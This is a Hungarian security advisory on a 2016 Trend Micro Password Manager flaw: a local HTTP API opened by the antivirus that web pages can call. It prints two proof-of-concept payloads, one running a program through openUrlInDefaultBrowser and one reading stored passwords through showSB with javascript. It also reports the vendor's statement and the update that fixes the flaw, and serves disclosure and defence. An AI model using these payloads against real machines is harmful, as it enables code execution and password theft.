Trend Micro Antivirus sérülékenysége

CH azonosító

CH-12926

Angol cím

Trend Micro Antivirus vulnerability

Felfedezés dátuma

2016.01.10.

Súlyosság

Magas

Érintett rendszerek

Anti-Virus
Trend Micro

Érintett verziók

Trend Micro Antivirus

Összefoglaló

A Trend Micro Antivirus sérülékenysége vált ismerté, melyet kihasználva a támadó tetszőleges kódot futtathat.

Leírás

A sérülékenységet az alapértelemezett jelszókezelő komponens hibája okozza, mely JavaScriptben íródott node.js-el, és HTTP RPC portokat nyit meg az API kérések kezeléséhez. Az openUrlInDefaultBrowser() függvény segítségével egy támadó tetszőleges kódot futtathat egy weboldalon keresztül, mint ahogy az alábbi példán is látható:

x = new XMLHttpRequest()
x.open("GET", "https://localhost:49155/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe true);
try { x.send(); } catch (e) {};

 

Egy második hiba miatt a pedig támadónak lehetősége nyílik megszerezni a jelszókezelőben tárolt jelszavakat az alábbi híváson keresztül:

https://localhost:49155/api/showSB?url=javascript:topWindow.process.mainModule.exports.Tower.handle.getUserData(function(n){alert(JSON.parse(n).data.passcard[0].Domain)})'

 

Továbbá a Trend Micro terméke önaláírt tanúsítványt helyez el a számítógép tanúsítványtárában.

Update 2016.01.13:

A Trend Micro tájékozatatta központunkat, hogy: “a hírekben szereplő, kritikus sérülékenységet kijavítottuk a Trend Micro Password Manager összes felhasználója számára. Szabványos tényfeltáró vizsgálatunk során meggyőződtünk róla, hogy a probléma egyedül a Trend Micro Password Manager lakossági piacra szánt változatát érintette, az üzleti és nagyvállalati termékekben nem jelentkezett. “
“2016. január 11-én kötelező érvényű frissítést bocsátottunk ki a Trend Micro ActiveUpdate szolgáltatásán keresztül, amely kijavítja a sérülékenységet: ezt minden felhasználónak telepítenie kell. Fontos tudni, hogy a Trend Micro Password Manager esetében az  ActiveUpdate frissítéseket nem lehet kikapcsolni, ami azt jelenti, hogy a Trend Micro Password Manager minden jelenlegi felhasználója automatikusan megkapja az ActiveUpdate frissítéseket. A jelentett, kritikus sérülékenység gyakorlatilag a Trend Micro Password Manager régi, ma már nem elérhető verzióját érinti.”

Tájékoztattak továbbá hogy nincs tudomásuk róla, hogy ez idő alatt bárkit a sérülékenységet kihasználó támadás ért volna.

Megoldás

Frissítsen a legújabb verzióra